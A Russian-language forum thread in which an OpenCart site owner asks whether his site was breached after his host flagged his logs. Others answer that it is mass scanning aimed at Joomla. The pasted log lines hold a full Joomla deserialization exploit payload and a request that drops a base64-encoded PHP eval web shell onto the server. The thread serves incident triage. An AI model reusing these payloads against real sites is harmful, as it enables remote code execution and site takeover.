Взлом?

[DobriyDed]

Добрейшего дня!

Сегодня пришло письмо от хостера :
Бла-бла-бла Вредоносный контент! Бла-бла-бла
/home/*****ru/logs/*****.ru-Jan-2016.gz: PHP.HostComm.#239333.PHP.BackDoor.remote.exec.inj.1.UNOFFICIAL

/home/*****ru/logs/*****.ru-Jan-2016.gz -  это файл хостера с логами за месяц

Покопавшись нашел лишь два подозрительных момента (повторяются несколько десятков раз, см. в конце сообщения)

Посему вопросы
- "А был ли мальчик?"
- Что за PHP.HostComm.#239333, вернее какие признаки наличия этой уязвимости? Может не то в логах смотрел?
- Если все же был взлом, что могли поломать/спереть?
- Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html , но более свежая 2.1.X.X+ ?
- Со стандартным .htaccess в корне что то дополнительно надо сделать?
например, magic quotes отрубать? Они включены почему то

Логи спрятаны. Админка спрятана, .htaccess в ней прописан на мои IP .

Заранее благодарю!

 

vvvvv кусочки лога с бякой vvvvv

4094 188.165.242.205 - - [08/Jan/2016:17:55:19 +0300] "POST / HTTP/1.1" 503 315 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:162:\"eval(chr(101).chr(99).chr(104).chr(111).chr(34).chr(120).chr(121).chr(105).chr(110).chr(105).chr(122).chr(100).chr(97).chr(34).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\\xf0\\xfd\\xfd\\xfd"

17178 91.207.6.18 - - [14/Jan/2016:12:39:34 +0300] "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/images/al277.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 404 24451 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

[tabook]

Хостер перебздел.

[DobriyDed]

Хостер перебздел.

Лучше переспать, чем недоесть :-D

 

Осталось понять:

- Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html , но более свежая 2.1.X.X+ ?

- Надо ли в корневом .htaccess  magic quotes отрубать? Они включены почему то

 

А данные из логов - это товарисчи вредители что пытаются сделать?

[halfhope]

Лучше переспать, чем недоесть :-D

 

Осталось понять:

- Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html , но более свежая 2.1.X.X+ ?

- Надо ли в корневом .htaccess  magic quotes отрубать? Они включены почему то

 

А данные из логов - это товарисчи вредители что пытаются сделать?

 

1. Нет.

2. Желательно отключать в php.ini или через панель управления хостингом. 

 

Это просто "холодный обзвон" потенциальных клиентов. Уязвимость даже не для OpenCart. OpenCart сам по себе простой и хорошо защищен, ибо в нем ничего нет). Иногда бывают просчеты в архитектуре и криворукость программистов, но MVC прощает большинство небезопасных ошибок, да и по сути написать небезопасный код тоже нужно постараться.

 

Если будут проблемы с вирусами, обращайтесь, я всегда на связи.

 

UPD: ава :-D

Змінено 2 лютого 2016 користувачем halfhope

[DobriyDed]

Спасибо !

 

Кавычки отрубил сразу, просто не было понятно почему они по умолчанию включены